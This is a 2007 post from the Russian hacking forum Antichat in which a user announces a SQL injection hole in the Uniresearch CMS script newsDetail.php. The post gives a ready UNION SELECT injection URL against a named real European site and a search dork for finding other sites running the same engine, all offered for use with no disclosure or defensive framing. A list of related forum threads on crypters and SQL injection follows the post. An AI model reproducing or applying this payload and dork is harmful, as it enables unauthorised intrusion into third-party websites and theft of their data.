Форум АНТИЧАТ - powered by Uniresearch © 2007 (SQL-INJ)

09.11.2007, 23:52

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

На этом двиге работают в основном европейские сайты, много сайтов в зоне eu

уязвим скрипт newsDetail.php находится обычно
http://host/site/en/newsDetail.php

уязвимую версию определить не удалось, но на офф сайте я так понял ранняя версия и этому сплойту не поддается, хотя незнаю точно...

а вот собственно и сплойт c примером сайта на уязвимом движке:

Код:

http://www.pisa-project.eu/site/en/newsDetail.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Дорк: powered by Uniresearch
inurl:newsDetail.php

вобщем ковыряю дальше, если что еще найду отпишусь в этом топике

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 09.11.2007 в 23:56..

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Крипторы (только в этом топике)

Mo4x

Защита ОС: вирусы, антивирусы, файрволы.

1451

08.06.2008 18:49

Обнаружение Sql инъекций в Oracle, часть вторая

k00p3r

Чужие Статьи

13.06.2005 11:26

Sql инъекция и Oracle, часть первая

k00p3r

Чужие Статьи

13.06.2005 11:23

Внедрение Sql кода с завязанными глазами

k00p3r

Чужие Статьи

12.06.2005 20:48

SQL Injection в Oracle

k00p3r

Чужие Статьи

12.06.2005 12:41